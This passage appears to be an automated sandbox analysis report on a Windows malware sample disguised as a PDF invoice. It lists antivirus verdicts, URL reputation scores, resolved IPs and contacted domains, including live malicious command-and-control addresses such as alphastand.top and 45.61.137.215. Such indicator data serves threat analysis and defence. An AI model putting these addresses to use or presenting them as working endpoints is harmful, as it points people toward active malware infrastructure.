            C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe100%AviraHEUR/AGEN.1311105
            C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe24%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
            https://wns.windows.com/bat0%URL Reputationsafe
            https://www.stacker.com/arizona/phoenix0%URL Reputationsafe
            https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
            https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de0%URL Reputationsafe
            https://excel.office.com0%URL Reputationsafe
            https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-0%URL Reputationsafe
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%URL Reputationsafe
            https://android.notify.windows.com/iOSp0%URL Reputationsafe
            https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal0%URL Reputationsafe
            https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc0%URL Reputationsafe
            https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o0%URL Reputationsafe
            https://api.msn.com/rT0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%URL Reputationsafe
            https://word.office.com0%URL Reputationsafe
            http://alphastand.top/alien/fre.php100%URL Reputationmalware
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
            https://android.notify.windows.com/iOSJM0%URL Reputationsafe
            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark0%URL Reputationsafe
            https://outlook.com0%URL Reputationsafe
            https://android.notify.windows.com/iOSZM0%URL Reputationsafe
            https://android.notify.windows.com/iOS0%URL Reputationsafe
            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark0%URL Reputationsafe
            https://api.msn.com/v1/news/Feed/Windows?z$0%URL Reputationsafe
            http://www.imdcaam.com0%Avira URL Cloudsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark0%URL Reputationsafe
            https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%URL Reputationsafe
            https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.bx2zyg.com0%Avira URL Cloudsafe
            https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%URL Reputationsafe
            http://www.w937xb.comReferer:0%Avira URL Cloudsafe
            http://schemas.micro0%URL Reputationsafe
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%URL Reputationsafe
            https://parade.com/61481/toriavey/where-did-hamburgers-originate0%URL Reputationsafe
            https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%URL Reputationsafe
            https://api.msn.com/~T0%URL Reputationsafe
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb0%URL Reputationsafe
            https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o0%URL Reputationsafe
            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%URL Reputationsafe
            http://www.banditsolana.com0%Avira URL Cloudsafe
            http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.com0%Avira URL Cloudsafe
            http://www.vivaness.club/dn03/www.w937xb.com0%Avira URL Cloudsafe
            http://www.w937xb.com/dn03/0%Avira URL Cloudsafe
            http://www.imdcaam.com/dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp0%Avira URL Cloudsafe
            http://www.numericalsemantics.com/dn03/0%Avira URL Cloudsafe
            http://www.servicepmgtl.world100%Avira URL Cloudmalware
            http://www.imdcaam.comReferer:0%Avira URL Cloudsafe
            http://45.61.137.215/index.php/3b1tenbkyj100%Avira URL Cloudmalware
            http://www.bx2zyg.comReferer:0%Avira URL Cloudsafe
            http://www.vivaness.club0%Avira URL Cloudsafe
            http://www.top-dao.comReferer:0%Avira URL Cloudsafe
            http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.com0%Avira URL Cloudsafe
            http://www.banditsolana.com/dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp0%Avira URL Cloudsafe
            http://www.ioco.in/dn03/0%Avira URL Cloudsafe
            http://www.verxop.xyz/dn03/0%Avira URL Cloudsafe
            http://www.top-dao.com/dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp0%Avira URL Cloudsafe
            http://www.sukhiclothing.com/dn03/www.banditsolana.com0%Avira URL Cloudsafe
            http://www.sukhiclothing.com0%Avira URL Cloudsafe
            http://www.jasonnutter.golf/dn03/0%Avira URL Cloudsafe
            http://www.banditsolana.com/dn03/0%Avira URL Cloudsafe
            http://www.banditsolana.comReferer:0%Avira URL Cloudsafe
            http://www.mcapitalparticipacoes.comReferer:0%Avira URL Cloudsafe
            http://www.cyberxdefend.com/dn03/www.ioco.in0%Avira URL Cloudsafe
            http://www.numericalsemantics.comReferer:0%Avira URL Cloudsafe
            https://www.yelp.com0%Avira URL Cloudsafe
            http://www.w937xb.com/dn03/www.servicepmgtl.world0%Avira URL Cloudsafe
            http://www.servicepmgtl.world/dn03/www.sukhiclothing.com100%Avira URL Cloudmalware
            http://www.top-dao.com/dn03/0%Avira URL Cloudsafe
            http://www.cataclysmicgamingapparel.com0%Avira URL Cloudsafe
            http://www.w937xb.com0%Avira URL Cloudsafe
            http://www.servicepmgtl.world/dn03/100%Avira URL Cloudmalware
            http://www.cyberxdefend.com0%Avira URL Cloudsafe
            http://www.mcapitalparticipacoes.com/dn03/www.top-dao.com0%Avira URL Cloudsafe
            http://www.servicepmgtl.worldReferer:0%Avira URL Cloudsafe
            http://www.mcapitalparticipacoes.com0%Avira URL Cloudsafe
            http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.com0%Avira URL Cloudsafe
            http://www.imdcaam.com/dn03/www.lovedacademy.com0%Avira URL Cloudsafe
            www.sukhiclothing.com/dn03/0%Avira URL Cloudsafe
            http://www.cataclysmicgamingapparel.com/dn03/0%Avira URL Cloudsafe
            http://www.vivaness.clubReferer:0%Avira URL Cloudsafe
            http://www.top-dao.com0%Avira URL Cloudsafe
            http://www.mcapitalparticipacoes.com/dn03/0%Avira URL Cloudsafe
            http://www.vivaness.club/dn03/0%Avira URL Cloudsafe
            http://www.jasonnutter.golf0%Avira URL Cloudsafe
            http://www.cataclysmicgamingapparel.comReferer:0%Avira URL Cloudsafe
            http://www.ioco.in0%Avira URL Cloudsafe
            http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.Resources0%Avira URL Cloudsafe
            http://www.verxop.xyzReferer:0%Avira URL Cloudsafe
            http://www.lovedacademy.com/dn03/www.vivaness.club0%Avira URL Cloudsafe
            http://www.lovedacademy.com0%Avira URL Cloudsafe
            http://www.lovedacademy.com/dn03/0%Avira URL Cloudsafe
            http://www.sukhiclothing.com/dn03/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.imdcaam.com
            216.40.34.41
            truetrue
              unknown
              www.banditsolana.com
              34.132.146.171
              truetrue
                unknown
                top-dao.com.lo1069.faipod.com
                101.36.116.238
                truetrue
                  unknown
                  www.vivaness.club
                  103.224.212.213
                  truetrue
                    unknown
                    mbsngradnja.com
                    77.105.36.123
                    truefalse
                      unknown
                      www.servicepmgtl.world
                      104.21.10.127
                      truetrue
                        unknown
                        parkingpage.namecheap.com
                        91.195.240.19
                        truetrue
                          unknown
                          sukhiclothing.com
                          3.33.130.190
                          truetrue
                            unknown
                            www.jasonnutter.golf
                            unknown
                            unknowntrue
                              unknown
                              www.sukhiclothing.com
                              unknown
                              unknowntrue
                                unknown
                                www.cataclysmicgamingapparel.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.top-dao.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.w937xb.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.mcapitalparticipacoes.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.lovedacademy.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.imdcaam.com/dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://45.61.137.215/index.php/3b1tenbkyjtrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.banditsolana.com/dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://alphastand.top/alien/fre.phptrue
                                          • URL Reputation: malware
                                          unknown
                                          http://www.top-dao.com/dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          www.sukhiclothing.com/dn03/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://wns.windows.com/batexplorer.exe, 00000014.00000000.1348137626.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757850550.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2293895318.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084622640.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.servicepmgtl.worldexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.stacker.com/arizona/phoenixexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086278814.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337843154.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.bx2zyg.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://excel.office.comexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.banditsolana.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.w937xb.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.imdcaam.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 00000014.00000003.2299538498.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1351724632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.w937xb.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.vivaness.club/dn03/www.w937xb.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.numericalsemantics.com/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.imdcaam.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSpexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.vivaness.clubexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.msn.com/rTexplorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.bx2zyg.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAjanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1324018301.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, YLc7afPlL4RjCeK.exe, 0000000E.00000002.1334933254.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.comexplorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.top-dao.comReferer:explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.verxop.xyz/dn03/explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://word.office.comexplorer.exe, 00000014.00000000.1351724632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2299538498.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3085301660.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3765324771.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
